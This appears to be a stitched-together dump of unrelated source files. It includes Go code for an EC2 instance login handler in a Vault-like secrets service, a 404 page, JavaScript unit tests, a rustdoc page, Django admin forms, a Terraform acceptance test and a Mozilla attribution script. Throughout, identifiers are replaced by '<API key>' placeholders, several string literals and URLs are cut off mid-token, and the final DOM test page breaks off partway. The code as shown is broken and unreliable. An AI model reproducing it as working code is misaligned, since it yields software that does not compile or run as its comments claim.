var identityDocParsed *identityDocument
if pkcs7B64 != "" {
identityDocParsed, err = b.<API key>(req.Storage, pkcs7B64)
if err != nil {
return nil, err
}
if identityDocParsed == nil {
return logical.ErrorResponse("failed to verify the instance identity document using pkcs7"), nil
}
} else {
identityDocParsed, err = b.<API key>(req.Storage, identityDocBytes, signatureBytes)
if err != nil {
return nil, err
}
if identityDocParsed == nil {
return logical.ErrorResponse("failed to verify the instance identity document using the SHA256 RSA digest"), nil
}
}
roleName := data.Get("role").(string)
// If roleName is not supplied, a role in the name of the instance's AMI ID will be looked for
if roleName == "" {
roleName = identityDocParsed.AmiID
}
// Validate the instance ID by making a call to AWS EC2 DescribeInstances API
// and fetching the instance description. Validation succeeds only if the
// instance is in 'running' state.
instanceDesc, err := b.validateInstance(req.Storage, identityDocParsed.InstanceID, identityDocParsed.Region, identityDocParsed.AccountID)
if err != nil {
return logical.ErrorResponse(fmt.Sprintf("failed to verify instance ID: %v", err)), nil
}
// Get the entry for the role used by the instance
roleEntry, err := b.lockedAWSRole(req.Storage, roleName)
if err != nil {
return nil, err
}
if roleEntry == nil {
return logical.ErrorResponse(fmt.Sprintf("entry for role %q not found", roleName)), nil
}
// Verify that the AMI ID of the instance trying to login matches the
// AMI ID specified as a constraint on the role
if roleEntry.BoundAmiID != "" && identityDocParsed.AmiID != roleEntry.BoundAmiID {
return logical.ErrorResponse(fmt.Sprintf("AMI ID %q does not belong to role %q", identityDocParsed.AmiID, roleName)), nil
}
// Verify that the AccountID of the instance trying to login matches the
// AccountID specified as a constraint on the role
if roleEntry.BoundAccountID != "" && identityDocParsed.AccountID != roleEntry.BoundAccountID {
return logical.ErrorResponse(fmt.Sprintf("Account ID %q does not belong to role %q", identityDocParsed.AccountID, roleName)), nil
}
// Check if the IAM instance profile ARN of the instance trying to
// login, matches the IAM instance profile ARN specified as a constraint
// on the role.
if roleEntry.<API key> != "" {
if instanceDesc.Reservations[0].Instances[0].IamInstanceProfile == nil {
return nil, fmt.Errorf("IAM instance profile in the instance description is nil")
}
if instanceDesc.Reservations[0].Instances[0].IamInstanceProfile.Arn == nil {
return nil, fmt.Errorf("IAM instance profile ARN in the instance description is nil")
}
<API key> := *instanceDesc.Reservations[0].Instances[0].IamInstanceProfile.Arn
if !strings.HasPrefix(<API key>, roleEntry.<API key>) {
return logical.ErrorResponse(fmt.Sprintf("IAM instance profile ARN %q does not satisfy the constraint role %q", <API key>, roleName)), nil
}
}
// Check if the IAM role ARN of the instance trying to login, matches
// the IAM role ARN specified as a constraint on the role.
if roleEntry.BoundIamRoleARN != "" {
if instanceDesc.Reservations[0].Instances[0].IamInstanceProfile == nil {
return nil, fmt.Errorf("IAM instance profile in the instance description is nil")
}
if instanceDesc.Reservations[0].Instances[0].IamInstanceProfile.Arn == nil {
return nil, fmt.Errorf("IAM instance profile ARN in the instance description is nil")
}
// Fetch the instance profile ARN from the instance description
<API key> := *instanceDesc.Reservations[0].Instances[0].IamInstanceProfile.Arn
if <API key> == "" {
return nil, fmt.Errorf("IAM instance profile ARN in the instance description is empty")
}
// Extract out the instance profile name from the instance
// profile ARN
<API key> := strings.SplitAfter(<API key>, ":instance-profile/")
<API key> := <API key>[len(<API key>)-1]
if <API key> == "" {
return nil, fmt.Errorf("failed to extract out IAM instance profile name from IAM instance profile ARN")
}
// Use instance profile ARN to fetch the associated role ARN
iamRoleARN, err := b.instanceIamRoleARN(req.Storage, <API key>, identityDocParsed.Region, identityDocParsed.AccountID)
if err != nil {
return nil, fmt.Errorf("IAM role ARN could not be fetched: %v", err)
}
if iamRoleARN == "" {
return nil, fmt.Errorf("IAM role ARN could not be fetched")
}
if !strings.HasPrefix(iamRoleARN, roleEntry.BoundIamRoleARN) {
return logical.ErrorResponse(fmt.Sprintf("IAM role ARN %q does not satisfy the constraint role %q", iamRoleARN, roleName)), nil
}
}
// Get the entry from the identity whitelist, if there is one
storedIdentity, err := <API key>(req.Storage, identityDocParsed.InstanceID)
if err != nil {
return nil, err
}
// <API key> value that gets cached at the stored
// identity-whitelist entry is determined not just by the role entry.
// If client explicitly sets nonce to be empty, it implies intent to
// disable reauthentication. Also, role tag can override the 'false'
// value with 'true' (the other way around is not allowed).
// Read the value from the role entry
<API key> := roleEntry.<API key>
clientNonce := ""
// Check if the nonce is supplied by the client
clientNonceRaw, clientNonceSupplied := data.GetOk("nonce")
if clientNonceSupplied {
clientNonce = clientNonceRaw.(string)
// Nonce explicitly set to empty implies intent to disable
// reauthentication by the client. Set a predefined nonce which
// indicates reauthentication being disabled.
if clientNonce == "" {
clientNonce = re<API key>
// Ensure that the intent lands in the whitelist
<API key> = true
}
}
// This is NOT a first login attempt from the client
if storedIdentity != nil {
// Check if the client nonce match the cached nonce and if the pending time
// of the identity document is not before the pending time of the document
// with which previous login was made. If '<API key>' is
// enabled on the registered role, client nonce requirement is relaxed.
if err = validateMetadata(clientNonce, identityDocParsed.PendingTime, storedIdentity, roleEntry); err != nil {
return logical.ErrorResponse(err.Error()), nil
}
// Don't let subsequent login attempts to bypass in initial
// intent of disabling reauthentication, despite the properties
// of role getting updated. For example: Role has the value set
// to 'false', a role-tag login sets the value to 'true', then
// role gets updated to not use a role-tag, and a login attempt
// is made with role's value set to 'false'. Removing the entry
// from the identity-whitelist should be the only way to be
// able to login from the instance again.
<API key> = <API key> || storedIdentity.<API key>
}
// If we reach this point without erroring and if the client nonce was
// not supplied, a first time login is implied and that the client
// intends that the nonce be generated by the backend. Create a random
// nonce to be associated for the instance ID.
if !clientNonceSupplied {
if clientNonce, err = uuid.GenerateUUID(); err != nil {
return nil, fmt.Errorf("failed to generate random nonce")
}
}
// Load the current values for max TTL and policies from the role entry,
// before checking for overriding max TTL in the role tag. The shortest
// max TTL is used to cap the token TTL; the longest max TTL is used to
// make the whitelist entry as long as possible as it controls for replay
// attacks.
shortestMaxTTL := b.System().MaxLeaseTTL()
longestMaxTTL := b.System().MaxLeaseTTL()
if roleEntry.MaxTTL > time.Duration(0) && roleEntry.MaxTTL < shortestMaxTTL {
shortestMaxTTL = roleEntry.MaxTTL
}
if roleEntry.MaxTTL > longestMaxTTL {
longestMaxTTL = roleEntry.MaxTTL
}
policies := roleEntry.Policies
rTagMaxTTL := time.Duration(0)
if roleEntry.RoleTag != "" {
// Role tag is enabled on the role.
// Overwrite the policies with the ones returned from processing the role tag
resp, err := b.handleRoleTagLogin(req.Storage, identityDocParsed, roleName, roleEntry, instanceDesc)
if err != nil {
return nil, err
}
if resp == nil {
return logical.ErrorResponse("failed to fetch and verify the role tag"), nil
}
// If there are no policies on the role tag, policies on the role are inherited.
// If policies on role tag are set, by this point, it is verified that it is a subset of the
// policies on the role. So, apply only those.
if len(resp.Policies) != 0 {
policies = resp.Policies
}
// If roleEntry had <API key> set to 'true', do not reset it
// to 'false' based on role tag having it not set. But, if role tag had it set,
// be sure to override the value.
if !<API key> {
<API key> = resp.<API key>
}
// Cache the value of role tag's max_ttl value
rTagMaxTTL = resp.MaxTTL
// Scope the shortestMaxTTL to the value set on the role tag
if resp.MaxTTL > time.Duration(0) && resp.MaxTTL < shortestMaxTTL {
shortestMaxTTL = resp.MaxTTL
}
if resp.MaxTTL > longestMaxTTL {
longestMaxTTL = resp.MaxTTL
}
}
// Save the login attempt in the identity whitelist
currentTime := time.Now()
if storedIdentity == nil {
// Role, ClientNonce and CreationTime of the identity entry,
// once set, should never change.
storedIdentity = &whitelistIdentity{
Role: roleName,
ClientNonce: clientNonce,
CreationTime: currentTime,
}
}
// <API key>, PendingTime, LastUpdatedTime and
// ExpirationTime may change.
storedIdentity.LastUpdatedTime = currentTime
storedIdentity.ExpirationTime = currentTime.Add(longestMaxTTL)
storedIdentity.PendingTime = identityDocParsed.PendingTime
storedIdentity.<API key> = <API key>
// Don't cache the nonce if <API key> is set
if storedIdentity.<API key> {
storedIdentity.ClientNonce = ""
}
// Sanitize the nonce to a reasonable length
if len(clientNonce) > 128 && !storedIdentity.<API key> {
return logical.ErrorResponse("client nonce exceeding the limit of 128 characters"), nil
}
if err = <API key>(req.Storage, identityDocParsed.InstanceID, storedIdentity); err != nil {
return nil, err
}
resp := &logical.Response{
Auth: &logical.Auth{
Period: roleEntry.Period,
Policies: policies,
Metadata: map[string]string{
"instance_id": identityDocParsed.InstanceID,
"region": identityDocParsed.Region,
"account_id": identityDocParsed.AccountID,
"role_tag_max_ttl": rTagMaxTTL.String(),
"role": roleName,
"ami_id": identityDocParsed.AmiID,
},
LeaseOptions: logical.LeaseOptions{
Renewable: true,
TTL: roleEntry.TTL,
},
},
}
// Return the nonce only if reauthentication is allowed
if !<API key> {
// Echo the client nonce back. If nonce param was not supplied
// to the endpoint at all (setting it to empty string does not
// qualify here), callers should extract out the nonce from
// this field for reauthentication requests.
resp.Auth.Metadata["nonce"] = clientNonce
}
if roleEntry.Period > time.Duration(0) {
resp.Auth.TTL = roleEntry.Period
} else {
// Cap the TTL value.
shortestTTL := b.System().DefaultLeaseTTL()
if roleEntry.TTL > time.Duration(0) && roleEntry.TTL < shortestTTL {
shortestTTL = roleEntry.TTL
}
if shortestMaxTTL < shortestTTL {
resp.AddWarning(fmt.Sprintf("Effective ttl of %q exceeded the effective max_ttl of %q; ttl value is capped appropriately", (shortestTTL / time.Second).String(), (shortestMaxTTL / time.Second).String()))
shortestTTL = shortestMaxTTL
}
resp.Auth.TTL = shortestTTL
}
return resp, nil
}
// handleRoleTagLogin is used to fetch the role tag of the instance and
// verifies it to be correct. Then the policies for the login request will be
// set off of the role tag, if certain creteria satisfies.
func (b *backend) handleRoleTagLogin(s logical.Storage, identityDocParsed *identityDocument, roleName string, roleEntry *awsRoleEntry, instanceDesc *ec2.<API key>) (*<API key>, error) {
if identityDocParsed == nil {
return nil, fmt.Errorf("nil parsed identity document")
}
if roleEntry == nil {
return nil, fmt.Errorf("nil role entry")
}
if instanceDesc == nil {
return nil, fmt.Errorf("nil instance description")
}
// Input validation on instanceDesc is not performed here considering
// that it would have been done in validateInstance method.
tags := instanceDesc.Reservations[0].Instances[0].Tags
if tags == nil || len(tags) == 0 {
return nil, fmt.Errorf("missing tag with key %q on the instance", roleEntry.RoleTag)
}
// Iterate through the tags attached on the instance and look for
// a tag with its 'key' matching the expected role tag value.
rTagValue := ""
for _, tagItem := range tags {
if tagItem.Key != nil && *tagItem.Key == roleEntry.RoleTag {
rTagValue = *tagItem.Value
break
}
}
// If 'role_tag' is enabled on the role, and if a corresponding tag is not found
// to be attached to the instance, fail.
if rTagValue == "" {
return nil, fmt.Errorf("missing tag with key %q on the instance", roleEntry.RoleTag)
}
// Parse the role tag into a struct, extract the plaintext part of it and verify its HMAC
rTag, err := b.<API key>(s, rTagValue)
if err != nil {
return nil, err
}
// Check if the role name with which this login is being made is same
// as the role name embedded in the tag.
if rTag.Role != roleName {
return nil, fmt.Errorf("role on the tag is not matching the role supplied")
}
// If instance_id was set on the role tag, check if the same instance is attempting to login
if rTag.InstanceID != "" && rTag.InstanceID != identityDocParsed.InstanceID {
return nil, fmt.Errorf("role tag is being used by an unauthorized instance.")
}
// Check if the role tag is blacklisted
blacklistEntry, err := b.<API key>(s, rTagValue)
if err != nil {
return nil, err
}
if blacklistEntry != nil {
return nil, fmt.Errorf("role tag is blacklisted")
}
// Ensure that the policies on the RoleTag is a subset of policies on the role
if !strutil.StrListSubset(roleEntry.Policies, rTag.Policies) {
return nil, fmt.Errorf("policies on the role tag must be subset of policies on the role")
}
return &<API key>{
Policies: rTag.Policies,
MaxTTL: rTag.MaxTTL,
<API key>: rTag.<API key>,
}, nil
}
// pathLoginRenew is used to renew an authenticated token
func (b *backend) pathLoginRenew(
req *logical.Request, data *framework.FieldData) (*logical.Response, error) {
instanceID := req.Auth.Metadata["instance_id"]
if instanceID == "" {
return nil, fmt.Errorf("unable to fetch instance ID from metadata during renewal")
}
region := req.Auth.Metadata["region"]
if region == "" {
return nil, fmt.Errorf("unable to fetch region from metadata during renewal")
}
// Ensure backwards compatibility for older clients without account_id saved in metadata
accountID, ok := req.Auth.Metadata["account_id"]
if ok {
if accountID == "" {
return nil, fmt.Errorf("unable to fetch account_id from metadata during renewal")
}
}
// Cross check that the instance is still in 'running' state
_, err := b.validateInstance(req.Storage, instanceID, region, accountID)
if err != nil {
return nil, fmt.Errorf("failed to verify instance ID %q: %q", instanceID, err)
}
storedIdentity, err := <API key>(req.Storage, instanceID)
if err != nil {
return nil, err
}
if storedIdentity == nil {
return nil, fmt.Errorf("failed to verify the whitelist identity entry for instance ID: %q", instanceID)
}
// Ensure that role entry is not deleted
roleEntry, err := b.lockedAWSRole(req.Storage, storedIdentity.Role)
if err != nil {
return nil, err
}
if roleEntry == nil {
return nil, fmt.Errorf("role entry not found")
}
// If the login was made using the role tag, then max_ttl from tag
// is cached in internal data during login and used here to cap the
// max_ttl of renewal.
rTagMaxTTL, err := time.ParseDuration(req.Auth.Metadata["role_tag_max_ttl"])
if err != nil {
return nil, err
}
// Re-evaluate the maxTTL bounds
shortestMaxTTL := b.System().MaxLeaseTTL()
longestMaxTTL := b.System().MaxLeaseTTL()
if roleEntry.MaxTTL > time.Duration(0) && roleEntry.MaxTTL < shortestMaxTTL {
shortestMaxTTL = roleEntry.MaxTTL
}
if roleEntry.MaxTTL > longestMaxTTL {
longestMaxTTL = roleEntry.MaxTTL
}
if rTagMaxTTL > time.Duration(0) && rTagMaxTTL < shortestMaxTTL {
shortestMaxTTL = rTagMaxTTL
}
if rTagMaxTTL > longestMaxTTL {
longestMaxTTL = rTagMaxTTL
}
// Only LastUpdatedTime and ExpirationTime change and all other fields remain the same
currentTime := time.Now()
storedIdentity.LastUpdatedTime = currentTime
storedIdentity.ExpirationTime = currentTime.Add(longestMaxTTL)
// Updating the expiration time is required for the tidy operation on the
// whitelist identity storage items
if err = <API key>(req.Storage, instanceID, storedIdentity); err != nil {
return nil, err
}
// If 'Period' is set on the role, then the token should never expire. Role
// tag does not have a 'Period' field. So, regarless of whether the token
// was issued using a role login or a role tag login, the period set on the
// role should take effect.
if roleEntry.Period > time.Duration(0) {
req.Auth.TTL = roleEntry.Period
return &logical.Response{Auth: req.Auth}, nil
} else {
// Cap the TTL value
shortestTTL := b.System().DefaultLeaseTTL()
if roleEntry.TTL > time.Duration(0) && roleEntry.TTL < shortestTTL {
shortestTTL = roleEntry.TTL
}
if shortestMaxTTL < shortestTTL {
shortestTTL = shortestMaxTTL
}
return framework.LeaseExtend(shortestTTL, shortestMaxTTL, b.System())(req, data)
}
}
// identityDocument represents the items of interest from the EC2 instance
// identity document
type identityDocument struct {
Tags map[string]interface{} `json:"tags,omitempty" structs:"tags" mapstructure:"tags"`
InstanceID string `json:"instanceId,omitempty" structs:"instanceId" mapstructure:"instanceId"`
AmiID string `json:"imageId,omitempty" structs:"imageId" mapstructure:"imageId"`
AccountID string `json:"accountId,omitempty" structs:"accountId" mapstructure:"accountId"`
Region string `json:"region,omitempty" structs:"region" mapstructure:"region"`
PendingTime string `json:"pendingTime,omitempty" structs:"pendingTime" mapstructure:"pendingTime"`
}
// <API key> represents the return values required after the process
// of verifying a role tag login
type <API key> struct {
Policies []string `json:"policies" structs:"policies" mapstructure:"policies"`
MaxTTL time.Duration `json:"max_ttl" structs:"max_ttl" mapstructure:"max_ttl"`
<API key> bool `json:"<API key>" structs:"<API key>" mapstructure:"<API key>"`
}
const pathLoginSyn = `
Authenticates an EC2 instance with Vault.
`
const pathLoginDesc = `
An EC2 instance is authenticated using the PKCS#7 signature of the instance identity
document and a client created nonce. This nonce should be unique and should be used by
the instance for all future logins, unless '<API key>' option on the
registered role is enabled, in which case client nonce is optional.
First login attempt, creates a whitelist entry in Vault associating the instance to the nonce
provided. All future logins will succeed only if the client nonce matches the nonce in the
whitelisted entry.
By default, a cron task will periodically look for expired entries in the whitelist
and deletes them. The duration to periodically run this, is one hour by default.
However, this can be configured using the 'config/tidy/identities' endpoint. This tidy
action can be triggered via the API as well, using the 'tidy/identities' endpoint.
` |
<html>
<head>
<title>Not Found</title>
<style>
body {
padding: 50px;
font: 14px Helvetica, Arial;
}
</style>
</head>
<body>
<h1>Sorry! Can't find that.</h1>
<p>The page you requested cannot be found.</p>
</body>
</html> |
'use strict';
define([
'chai',
'lib/constants',
'models/reliers/relier',
'../../../mocks/window',
'../../../lib/helpers'
], function (chai, Constants, Relier, WindowMock, TestHelpers) {
var assert = chai.assert;
describe('models/reliers/relier', function () {
var relier;
var windowMock;
var SERVICE = 'service';
var SYNC_SERVICE = 'sync';
var PREVERIFY_TOKEN = 'abigtoken';
var EMAIL = 'email';
var UID = 'uid';
beforeEach(function () {
windowMock = new WindowMock();
relier = new Relier({
window: windowMock
});
});
describe('fetch', function () {
it('populates expected fields from the search parameters, unexpected search parameters are ignored', function () {
windowMock.location.search = TestHelpers.toSearchString({
preVerifyToken: PREVERIFY_TOKEN,
service: SERVICE,
email: EMAIL,
uid: UID,
ignored: 'ignored'
});
return relier.fetch()
.then(function () {
assert.equal(relier.get('preVerifyToken'), PREVERIFY_TOKEN);
assert.equal(relier.get('service'), SERVICE);
assert.equal(relier.get('email'), EMAIL);
assert.equal(relier.get('uid'), UID);
assert.isFalse(relier.has('ignored'));
});
});
});
describe('isOAuth', function () {
it('returns `false`', function () {
assert.isFalse(relier.isOAuth());
});
});
describe('isFxDesktop', function () {
it('returns `false`', function () {
assert.isFalse(relier.isFxDesktop());
});
});
describe('getResumeToken', function () {
it('returns null', function () {
assert.isNull(relier.getResumeToken());
});
});
describe('isSync', function () {
it('returns true if `service=sync`', function () {
windowMock.location.search = TestHelpers.toSearchString({
service: SYNC_SERVICE
});
return relier.fetch()
.then(function () {
assert.isTrue(relier.isSync());
});
});
it('returns false otw', function () {
windowMock.location.search = TestHelpers.toSearchString({
service: SERVICE
});
return relier.fetch()
.then(function () {
assert.isFalse(relier.isSync());
});
});
});
describe('<API key>', function () {
it('returns `true` if `email` not set', function () {
return relier.fetch()
.then(function () {
assert.isTrue(relier.<API key>());
});
});
it('returns `true` if `email` is set to an email address', function () {
windowMock.location.search = TestHelpers.toSearchString({
email: 'testuser@testuser.com'
});
return relier.fetch()
.then(function () {
assert.isTrue(relier.<API key>());
});
});
it('returns `false` if `email` is set to `blank`', function () {
windowMock.location.search = TestHelpers.toSearchString({
email: Constants.<API key>
});
return relier.fetch()
.then(function () {
assert.isFalse(relier.<API key>());
// the email should not be set on the relier model
assert.isFalse(relier.has('email'));
});
});
});
});
}); |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `S0` fn in crate `encoding`.">
<meta name="keywords" content="rust, rustlang, rust-lang, S0">
<title>encoding::codec::japanese::eucjp::transient::S0 - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../../../rustdoc.css">
<link rel="stylesheet" type="text/css" href="../../../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<nav class="sidebar">
<p class='location'><a href='../../../../index.html'>encoding</a>::<wbr><a href='../../../index.html'>codec</a>::<wbr><a href='../../index.html'>japanese</a>::<wbr><a href='../index.html'>eucjp</a>::<wbr><a href='index.html'>transient</a></p><script>window.sidebarCurrent = {name: 'S0', ty: 'fn', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</nav>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content fn">
<h1 class='fqn'><span class='in-band'>Function <a href='../../../../index.html'>encoding</a>::<wbr><a href='../../../index.html'>codec</a>::<wbr><a href='../../index.html'>japanese</a>::<wbr><a href='../index.html'>eucjp</a>::<wbr><a href='index.html'>transient</a>::<wbr><a class='fn' href=''>S0</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-1051' class='srclink' href='../../../../../src/encoding/util.rs.html#209-211' title='goto source code'>[src]</a></span></h1>
<pre class='rust fn'>pub fn S0<T>(_: &mut <a class='type' href='../../../../../encoding/codec/japanese/eucjp/internal/type.Context.html' title='encoding::codec::japanese::eucjp::internal::Context'>Context</a><T>) -> <a class='enum' href='../../../../../encoding/codec/japanese/eucjp/enum.State.html' title='encoding::codec::japanese::eucjp::State'>State</a></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<aside id="help" class="hidden">
<div>
<h1 class="hidden">Help</h1>
<div class="shortcuts">
<h2>Keyboard Shortcuts</h2>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
<dt>+</dt>
<dd>Collapse/expand all sections</dd>
</dl>
</div>
<div class="infos">
<h2>Search Tricks</h2>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code> or <code>* -> vec</code>)
</p>
</div>
</div>
</aside>
<script>
window.rootPath = "../../../../../";
window.currentCrate = "encoding";
window.playgroundUrl = "";
</script>
<script src="../../../../../jquery.js"></script>
<script src="../../../../../main.js"></script>
<script defer src="../../../../../search-index.js"></script>
</body>
</html> |
# -*- coding: utf-8 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
from django import forms
from django.forms.models import <API key>, BaseInlineFormSet
from django.forms.utils import ErrorList
from django.utils.translation import ugettext_lazy as _
from ckeditor.widgets import CKEditorWidget
from tinymce.widgets import TinyMCE
from utils import widgets
from identificacao.models import Identificacao
from memorando.models import MemorandoFAPESP, MemorandoResposta, Pergunta,\
MemorandoSimples, Corpo, MemorandoPinpoint
class <API key>(forms.ModelForm):
introducao = forms.CharField(required=False, label=u'Introdução',
widget=TinyMCE(attrs={'cols': 160, 'rows': 180}, mce_attrs={'height': 500}))
conclusao = forms.CharField(required=False, label=u'Conclusão',
widget=TinyMCE(attrs={'cols': 160, 'rows': 180}, mce_attrs={'height': 500}))
memorando = forms.ModelChoiceField(MemorandoFAPESP.objects.all(), label=u'Memorando FAPESP',
widget=forms.Select(attrs={'onchange': '<API key>(this.value);'}))
def __init__(self, *args, **kwargs):
super(<API key>, self).__init__(*args, **kwargs)
self.fields['identificacao'].choices = [('', '
[(p.id, p.__unicode__()) for p in Identificacao.objects.all()
.select_related('endereco__entidade', 'contato')]
class Meta:
model = MemorandoResposta
fields = ['memorando', 'assunto', 'identificacao', 'estado', 'introducao', 'conclusao', 'assinatura', 'data',
'arquivo', 'protocolo', 'anexa_relatorio', 'obs']
class PerguntaAdminForm(forms.ModelForm):
questao = forms.CharField(label=u'Questão',
widget=TinyMCE(attrs={'cols': 100, 'rows': 30}, mce_attrs={'height': 120}))
class Meta:
model = Pergunta
fields = ['numero', 'questao']
class <API key>(forms.ModelForm):
# corpo = forms.CharField(widget=TinyMCE(attrs={'cols': 160, 'rows': 180}, mce_attrs={'height':500}))
corpo = forms.CharField(widget=CKEditorWidget())
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList, label_suffix=':',
empty_permitted=False, instance=None):
super(<API key>, self).__init__(data, files, auto_id, prefix, initial,
error_class, label_suffix, empty_permitted, instance)
self.fields['pai'].choices = [('', '
[(p.id, p.__unicode__())
for p in MemorandoSimples.objects.all().select_related('assunto')]
class Meta:
model = MemorandoSimples
fields = ['superior', 'inferior', 'direita', 'esquerda', 'destinatario', 'assunto', 'corpo', 'equipamento',
'envio', 'assinatura', 'assinado', 'pai']
class <API key>(forms.ModelForm):
corpo = forms.CharField(widget=CKEditorWidget())
class Meta:
model = MemorandoPinpoint
fields = ['destinatario', 'assunto', 'corpo', 'envio', 'assinatura',
'assinado']
class CorpoAdminForm(forms.ModelForm):
# MemorandoResposta - corpo de cada pergunta/resposta do memorando
pergunta = forms.ModelChoiceField(Pergunta.objects.all().select_related('memorando'),
label=_(u'Pergunta'),
widget=forms.Select(attrs={'onchange': '<API key>(this.id);'}))
perg = forms.CharField(label='Texto da pergunta', widget=widgets.PlainTextWidget, required=False)
resposta = forms.CharField(label='Resposta',
widget=TinyMCE(attrs={'cols': 50, 'rows': 30}, mce_attrs={'height': 120}))
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList, label_suffix=':',
empty_permitted=False, instance=None):
super(CorpoAdminForm, self).__init__(data, files, auto_id, prefix, initial,
error_class, label_suffix, empty_permitted, instance)
if data:
pergunta_id = data.get('pergunta')
if pergunta_id:
pgta = Pergunta.objects.select_related('memorando').get(id=pergunta_id)
self.fields['perg'].initial = pgta.questao
elif instance and hasattr(instance, 'pergunta'):
self.fields['perg'].initial = instance.pergunta.questao
class Meta:
model = Corpo
fields = ['pergunta', 'perg', 'resposta', 'anexo', 'concluido']
class Media:
js = ('js/selects.js', )
class <API key>(BaseInlineFormSet):
# MemorandoResposta - corpo de cada pergunta/resposta do memorando
def __init__(self, data=None, files=None, instance=None,
save_as_new=False, prefix=None, queryset=None):
super(<API key>, self).__init__(data=data, files=files, instance=instance, save_as_new=save_as_new,
prefix=prefix, queryset=queryset)
if data:
memorando_id = data.get('memorando')
if memorando_id:
m = MemorandoFAPESP.objects.get(id=memorando_id)
for f in self.forms:
f.fields['pergunta'].queryset = Pergunta.objects.select_related('memorando').filter(memorando=m)
self.empty_form.fields['pergunta'].queryset = Pergunta.objects.select_related('memorando').filter(memorando=m)
elif instance and hasattr(instance, 'memorando'):
m = instance.memorando
for f in self.forms:
f.fields['pergunta'].queryset = Pergunta.objects.select_related('memorando').filter(memorando=m)
self.empty_form.fields['pergunta'].queryset = Pergunta.objects.select_related('memorando').filter(memorando=m)
else:
for f in self.forms:
f.fields['pergunta'].queryset = Pergunta.objects.none()
self.empty_form.fields['pergunta'].queryset = Pergunta.objects.none()
CorpoFormSet = <API key>(MemorandoResposta, Corpo, formset=<API key>,
fields=['pergunta', 'resposta', 'anexo', 'concluido']) |
package aws
import (
"testing"
"github.com/hashicorp/terraform/helper/resource"
)
func <API key>(t *testing.T) {
resourceName := "aws_elb.bar"
resource.Test(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
Providers: testAccProviders,
CheckDestroy: <API key>,
Steps: []resource.TestStep{
{
Config: testAccAWSELBConfig,
},
{
ResourceName: resourceName,
ImportState: true,
ImportStateVerify: true,
},
},
})
} |
(function(Mozilla) {
'use strict';
var <API key> = {};
<API key>.<API key> = function(params) {
// preserve any existing utm params.
var current = new window._SearchParams().utmParams();
// if utm_content exists or utm_source is from AMO then don't modify anything.
if (current.utm_content || current.utm_source === 'addons.mozilla.org') {
return false;
}
// if custom attribution data is not fully formed then return false.
if (!Object.prototype.hasOwnProperty.call(params, 'utm_source') ||
!Object.prototype.hasOwnProperty.call(params, 'utm_medium') ||
!Object.prototype.hasOwnProperty.call(params, 'utm_campaign') ||
!Object.prototype.hasOwnProperty.call(params, 'utm_content')) {
return false;
}
return {
/* eslint-disable camelcase */
utm_source: current.utm_source || params.utm_source,
utm_medium: current.utm_medium || params.utm_medium,
utm_campaign: current.utm_campaign || params.utm_campaign,
utm_content: params.utm_content,
referrer: document.referrer
/* eslint-enable camelcase */
};
};
<API key>.init = function(params, callback) {
if (typeof Mozilla.StubAttribution === 'undefined' || typeof window._SearchParams === 'undefined') {
return;
}
// if we don't meet the usual requirements for stub attribution return false.
if (!Mozilla.StubAttribution.meetsRequirements()) {
return false;
}
// create our custom utm attribution data.
var data = <API key>.<API key>(params);
if (data) {
// authenticate the custom data in the usual manner and let stub attribution do the rest.
Mozilla.StubAttribution.<API key>(data);
// fire a callback if supplied (e.g. to fire a GA event).
if (typeof callback === 'function') {
callback();
}
} else {
Mozilla.StubAttribution.init();
}
};
window.Mozilla.<API key> = <API key>;
})(window.Mozilla); |
<!DOCTYPE HTML PUBLIC "-
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>http:
<link href="http:
<link rel="stylesheet" type="text/css" href="/tests/SimpleTest/test.css">
<script type="text/javascript" src="/MochiKit/packed.js"></script><script type="text/javascript" src="/tests/SimpleTest/SimpleTest.js"></script><script type="text/javascript" src="DOMTestCase.js"></script><script type="text/javascript" src="exclusions.js"></script><script type="text/javascript">
// expose test function names
function <API key>()
{
return ['textsplittexttwo'];
}
var docsLoaded = -1000000;
var builder = null;
// This function is called by the testing framework before
// running the test suite.
// If there are no configuration exceptions, asynchronous
// document loading is started. Otherwise, the status
// is set to complete and the exception is immediately
// raised when entering the body of the test.
function setUpPage() {
setUpPageStatus = 'running';
try {
// creates test document builder, may throw exception
builder = <API key>();
docsLoaded = 0;
var docRef = null;
if (typeof(this.doc) != 'undefined') {
docRef = this.doc;
}
docsLoaded += preload(docRef, "doc", "staff");
if (docsLoaded == 1) {
setUpPage = 'complete';
}
} catch(ex) {
<API key>(builder, ex);
setUpPage = 'complete';
}
}
// This method is called on the completion of
// each asychronous load started in setUpTests.
// When every synchronous loaded document has completed,
// the page status is changed which allows the
// body of the test to be executed.
function loadComplete() {
if (++docsLoaded == 1) {
setUpPageStatus = 'complete';
runJSUnitTests();
markTodos();
SimpleTest.finish();
}
}
var docName = 'textsplittexttwo';
